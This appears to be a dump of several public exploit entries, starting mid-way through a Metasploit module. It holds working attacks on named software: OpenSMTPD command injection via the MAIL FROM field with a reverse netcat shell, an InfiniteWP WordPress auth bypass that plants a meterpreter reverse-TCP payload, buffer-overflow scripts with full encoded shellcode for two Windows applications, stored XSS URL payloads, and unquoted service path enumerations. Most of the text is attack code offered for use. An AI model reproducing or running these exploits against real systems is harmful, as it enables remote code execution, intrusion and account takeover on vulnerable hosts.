      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
    ))

    register_options([
      Opt::RPORT(25),
      OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])
    ])

    register_advanced_options([
      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
    ])
  end

  def check
    connect

    res = sock.get_once

    return CheckCode::Unknown unless res
    return CheckCode::Detected if res =~ /^220.*OpenSMTPD/

    CheckCode::Safe
  rescue EOFError, Rex::ConnectionError => e
    vprint_error(e.message)
    CheckCode::Unknown
  ensure
    disconnect
  end

  def exploit
    unless datastore['ForceExploit']
      unless check == CheckCode::Detected
        fail_with(Failure::Unknown, 'Set ForceExploit to override')
      end
    end

    # We don't care who we are, so randomize it
    me = rand_text_alphanumeric(8..42)

    # Send mail to this valid recipient
    to = datastore['RCPT_TO']

    # Comment "slide" courtesy of Qualys - brilliant!
    iter = rand_text_alphanumeric(15).chars.join(' ')
    from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;"

    # This is just insurance, since the code was already written
    if from.length > 64
      fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
    elsif (badchars = (from.chars & target['MyBadChars'])).any?
      fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
    end

    # Create the mail body with comment slide and payload
    body = "\r\n" + "#\r\n" * 15 + payload.encoded

    sploit = {
      nil                   => /220.*OpenSMTPD/,
      "HELO #{me}"          => /250.*pleased to meet you/,
      "MAIL FROM:<#{from}>" => /250.*Ok/,
      "RCPT TO:<#{to}>"     => /250.*Recipient ok/,
      'DATA'                => /354 Enter mail.*itself/,
      body                  => nil,
      '.'                   => /250.*Message accepted for delivery/,
      'QUIT'                => /221.*Bye/
    }

    print_status('Connecting to OpenSMTPD')
    connect

    print_status('Saying hello and sending exploit')
    sploit.each do |line, pattern|
      send_expect(
        line,
        pattern,
        sock:    sock,
        timeout: datastore['ExpectTimeout'],
        newline: "\r\n"
      )
    end
  rescue Rex::ConnectionError => e
    fail_with(Failure::Unreachable, e.message)
  rescue Timeout::Error => e
    fail_with(Failure::TimeoutExpired, e.message)
  ensure
    disconnect
  end

end
-
CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
# Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
# Google Dork: In Shodan search engine, the filter is "CHIYU"
# Date: 2020-02-11
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.chiyu-t.com.tw/en/
# Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00
# Tested on: It is a proprietary device: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html
# CVE: CVE-2020-8839

# 1. Description:
# In the CHIYU BF430 web page,
# a user can modify the system configuration by accessing /if.cgi.
# Attackers can inject malicious XSS code in the "TF_submask" field.
# The XSS code is stored in the database, which causes a stored XSS vulnerability.

# 2. Proof of Concept:
# Access /if.cgi of the CHIYU BF430 232/485 TCP/IP Converter.
# Inject the XSS code in the parameter "TF_submask":
# http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
-
Torrent iPod Video Converter 1.51 - Stack Overflow
# Exploit Title: Torrent iPod Video Converter 1.51 - Stack Overflow
# Exploit Author: boku
# Date: 2020-02-10
# Software Vendor: torrentrockyou
# Vendor Homepage: http://www.torrentrockyou.com
# Software Link: http://www.torrentrockyou.com/download/tripodconverter.exe
# Version: Torrent iPod Video Converter Version 1.51 Build 115
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363
# Recreate:
# 1) Download, install, and open Torrent iPod Video Converter
# 2) run python script & open created 'poc.txt' file
# 3) select-all > copy-all
# 4) in app, click 'Register' on the bottom
# 5) in 'Name:' textbox enter 'a'
# 6) in 'Code:' textbox paste buffer
# 7) click 'OK', calculator will open & app will crash

# ghoul@theZiggurat# msfvenom -p windows/exec CMD=calc EXITFUNC=seh --encoder x86/alpha_upper -v shellcode -f python
# x86/alpha_upper chosen with final size 447
# the decoder stubs GetPC routine includes bad characters. ESI is already at PC so no need to find it. Just remove the GetPC routine in the stub.
#shellcode = b"\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49"
# echo -ne "\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" | ndisasm -
# 89E7      mov di,sp
# DADC      fcmovu st4
# D977F4    fnstenv [bx-0xc]
# 5D        pop bp
# 55        push bp
# 59        pop cx
# 49        dec cx
shellcode  = b'\x54\x5f'              # push esp # pop edi
shellcode += b'\x56\x59'              # push esi # pop ecx
shellcode += b'\x41\x90'              # inc ecx # nop # Fix the offset for GetPC
shellcode += b'\x90\x90\x90\x90\x90'  # keep the byte length the same
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x45\x50\x35\x50"
shellcode += b"\x45\x50\x35\x30\x4c\x49\x4a\x45\x50\x31\x39"
shellcode += b"\x50\x33\x54\x4c\x4b\x36\x30\x30\x30\x4c\x4b"
shellcode += b"\x36\x32\x54\x4c\x4c\x4b\x50\x52\x32\x34\x4c"
shellcode += b"\x4b\x53\x42\x31\x38\x44\x4f\x38\x37\x50\x4a"
shellcode += b"\x57\x56\x30\x31\x4b\x4f\x4e\x4c\x37\x4c\x43"
shellcode += b"\x51\x43\x4c\x54\x42\x36\x4c\x57\x50\x39\x51"
shellcode += b"\x48\x4f\x34\x4d\x43\x31\x49\x57\x4d\x32\x4c"
shellcode += b"\x32\x36\x32\x31\x47\x4c\x4b\x56\x32\x44\x50"
shellcode += b"\x4c\x4b\x51\x5a\x47\x4c\x4c\x4b\x30\x4c\x44"
shellcode += b"\x51\x43\x48\x5a\x43\x57\x38\x43\x31\x48\x51"
shellcode += b"\x46\x31\x4c\x4b\x31\x49\x57\x50\x35\x51\x59"
shellcode += b"\x43\x4c\x4b\x30\x49\x34\x58\x4d\x33\x57\x4a"
shellcode += b"\x50\x49\x4c\x4b\x36\x54\x4c\x4b\x43\x31\x58"
shellcode += b"\x56\x30\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x54\x4d\x55\x51\x39\x57\x47\x48\x4b\x50\x54"
shellcode += b"\x35\x4c\x36\x45\x53\x53\x4d\x4c\x38\x47\x4b"
shellcode += b"\x43\x4d\x47\x54\x43\x45\x4d\x34\x51\x48\x4c"
shellcode += b"\x4b\x50\x58\x37\x54\x43\x31\x4e\x33\x53\x56"
shellcode += b"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x30\x58\x45"
shellcode += b"\x4c\x55\x51\x49\x43\x4c\x4b\x43\x34\x4c\x4b"
shellcode += b"\x33\x31\x38\x50\x4d\x59\x50\x44\x57\x54\x31"
shellcode += b"\x34\x51\x4b\x51\x4b\x45\x31\x30\x59\x31\x4a"
shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x51"
shellcode += b"\x4a\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x31\x4d"
shellcode += b"\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f\x42\x45"
shellcode += b"\x50\x55\x50\x35\x50\x56\x30\x45\x38\x56\x51"
shellcode += b"\x4c\x4b\x42\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f"
shellcode += b"\x4b\x4b\x4e\x44\x4e\x37\x42\x4a\x4a\x45\x38"
shellcode += b"\x4f\x56\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x59"
shellcode += b"\x45\x37\x4c\x43\x36\x33\x4c\x34\x4a\x4d\x50"
shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x35\x55\x4f\x4b\x37"
shellcode += b"\x37\x34\x53\x43\x42\x42\x4f\x53\x5a\x35\x50"
shellcode += b"\x56\x33\x4b\x4f\x4e\x35\x32\x43\x35\x31\x52"
shellcode += b"\x4c\x52\x43\x33\x30\x41\x41"

EIP_OS = '\x41'*(4136-len(shellcode))
EIP = '\x5a\x32\x4f'  # 0x004f325a : call esi {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent IPOD Video Converter\bsvideoconverter.exe)

payload = shellcode + EIP_OS + EIP

try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow
#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.picture-on-tv.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a

## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "key.txt".
#2. Just copy the text inside "key.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "key.txt" into the field: "Registration Key" > Click "Ok"
#5. The calculator runs successfully

#!/usr/bin/python
from struct import pack

buffer = "\x41" * 1608
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10014283) #0x10014283 : pop ebx # pop ecx # ret 0x0c | {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll)

shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode

try:
    f=open("key.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
-
freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path
Exploit Title: freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.freesshd.com
Software Link: http://www.freesshd.com/freeFTPd.exe
Version: 1.0.13
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freeftp" | findstr /i /v """
freeFTPdService    C:\Program Files\freeSSHd\freeFTPdService.exe    Auto

C:\Users\nightelf>sc qc freeFTPdService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: freeFTPdService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\freeSSHd\freeFTPdService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : freeFTPdService
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem
-
Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting
# Exploit Title: Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-02-10
# Exploit Author: Sayak Naskar
# Vendor Homepage: https://vanillaforums.com/en/
# Version: 2.6.3
# Tested on: Windows, Linux
# CVE : CVE-2020-8825

A stored XSS was found in Vanilla Forums 2.6.3 at index.php?p=/dashboard/settings/branding

# Proof of Concept:
An attacker inserts a payload in the branding section. Whenever a user opens the branding section, the attacker automatically obtains all sensitive information of that user.
-
FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path
Exploit Title: FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.freesshd.com
Software Link: http://www.freesshd.com/freeSSHd.exe
Version: 1.3.1
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freesshd" | findstr /i /v """
FreeSSHDService    C:\Program Files\freeSSHd\FreeSSHDService.exe    Auto

C:\Users\nightelf>sc qc FreeSSHDService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FreeSSHDService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\freeSSHd\FreeSSHDService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : FreeSSHDService
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem
-
Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path
Exploit Title: Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.syncbreeze.com
Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v12.4.18.exe
Version: 12.4.18
Tested On: Windows 10 (32-bit)

C:\Users\elaglor>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Sync Breeze Enterprise    C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe    Auto

C:\Users\elaglor>sc qc "Sync Breeze Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Sync Breeze Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Sync Breeze Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
-
DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow
#Exploit Title: DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-10
#Vendor Homepage : http://www.picture-on-tv.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a

## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "name.txt".
#2. Just copy the text inside "name.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "name.txt" into the field: "Registration Name" > Click "Ok"
#5. The calculator runs successfully

#!/usr/bin/python
from struct import pack

buffer = "\x41" * 256
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x1004bb51) #0x1004bb51 : pop edi # pop esi # ret 0x0c | {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\DVD Photo Slideshow Professional\DVDPhotoData.dll)
long_buffer = "\x44" * 600

shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode + long_buffer

try:
    f=open("name.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
-
WordPress Plugin InfiniteWP - Client Authentication Bypass (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ManualRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress InfiniteWP Client Authentication Bypass',
      'Description'    => %q{
        This module exploits an authentication bypass in the WordPress
        InfiniteWP Client plugin to log in as an administrator and execute
        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.

        The module will attempt to retrieve the original PLUGIN_FILE contents
        and restore them after payload execution. If VerifyContents is set,
        which is the default setting, the module will check to see if the
        restored contents match the original.

        Note that a valid administrator username is required for this module.
        WordPress >= 4.9 is currently not supported due to a breaking
        WordPress API change. Tested against 4.8.3.
      },
      'Author'         => [
        'WebARX', # Discovery
        'wvu'     # Module
      ],
      'References'     => [
        ['WPVDB', '10011'],
        ['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'],
        ['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'],
        ['URL', 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html']
      ],
      'DisclosureDate' => '2020-01-14',
      'License'        => MSF_LICENSE,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Privileged'     => false,
      'Targets'        => [['InfiniteWP Client < 1.9.4.5', {}]],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'}
    ))

    register_options([
      OptString.new('USERNAME',    [true, 'WordPress username', 'admin']),
      OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php'])
    ])

    register_advanced_options([
      OptBool.new('VerifyContents', [false, 'Verify file contents', true])
    ])
  end

  def username
    datastore['USERNAME']
  end

  def plugin_file
    datastore['PLUGIN_FILE']
  end

  def plugin_uri
    normalize_uri(wordpress_url_plugins, plugin_file)
  end

  def check
    unless wordpress_and_online?
      return CheckCode::Unknown('Is the site online and running WordPress?')
    end

    unless (version = wordpress_version)
      return CheckCode::Unknown('Could not detect WordPress version')
    end

    if Gem::Version.new(version) >= Gem::Version.new('4.9')
      return CheckCode::Safe("WordPress #{version} is an unsupported target")
    end

    vprint_good("WordPress #{version} is a supported target")

    check_version_from_custom_file(
      normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'),
      /^= ([\d.]+)/,
      '1.9.4.5'
    )
  end

  # https://plugins.trac.wordpress.org/browser/iwp-client/tags/1.9.4.4/init.php
  def auth_bypass
    json = {
      'iwp_action' => %w[add_site readd_site].sample,
      'params'     => {'username' => username}
    }.to_json

    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => wordpress_url_backend,
      'data'   => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
    )

    unless res && res.code == 200 && !(cookie = res.get_cookies).empty?
      fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
    end

    print_good("Successfully obtained cookie for #{username}")
    vprint_status("Cookie: #{cookie}")

    cookie
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    print_status("Bypassing auth for #{username} at #{full_uri}")

    unless (@cookie = auth_bypass).include?('wordpress_logged_in')
      fail_with(Failure::NoAccess, "Could not log in as #{username}")
    end

    print_good("Successfully logged in as #{username}")

    write_and_exec_payload
  end

  def write_and_exec_payload
    print_status("Retrieving original contents of #{plugin_uri}")

    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)

    unless contents
      fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}")
    end

    print_good("Successfully retrieved original contents of #{plugin_uri}")
    vprint_status('Contents:')
    print(contents)

    print_status("Overwriting #{plugin_uri} with payload")

    unless wordpress_edit_plugin(plugin_file, payload.encoded, @cookie)
      fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}")
    end

    print_good("Successfully overwrote #{plugin_uri} with payload")

    print_status("Requesting payload at #{plugin_uri}")

    send_request_cgi({
      'method' => 'GET',
      'uri'    => plugin_uri
    }, 0)

    restore_contents(contents)
  end

  def restore_contents(og_contents)
    print_status("Restoring original contents of #{plugin_uri}")

    unless wordpress_edit_plugin(plugin_file, og_contents, @cookie)
      fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}")
    end

    return unless datastore['VerifyContents']

    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)

    unless contents == og_contents
      fail_with(Failure::UnexpectedReply, "Current contents of #{plugin_uri} DO NOT match original!")
    end

    print_good("Current contents of #{plugin_uri} match original!")
  end

end
-
Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path
Exploit Title: Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.disksorter.com
Software Link: http://www.disksorter.com/setups/disksorterent_setup_v12.4.16.exe
Version: 12.4.16
Tested On: Windows 10 (32-bit)

C:\Users\terran>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "Disk Sorter" | findstr /i /v """
Disk Sorter Enterprise    C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe    Auto

C:\Users\terran>sc qc "Disk Sorter Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Sorter Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Sorter Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
-
Disk Savvy Enterprise 12.3.18 - Unquoted Service Path
Exploit Title: Disk Savvy Enterprise 12.3.18 - Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.disksavvy.com
Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v12.3.18.exe
Version: 12.3.18
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "Disk Savvy" | findstr /i /v """
Disk Savvy Enterprise    C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe    Auto

C:\Users\nightelf>sc qc "Disk Savvy Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Disk Savvy Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Disk Savvy Enterprise\bin\disksvs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Disk Savvy Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
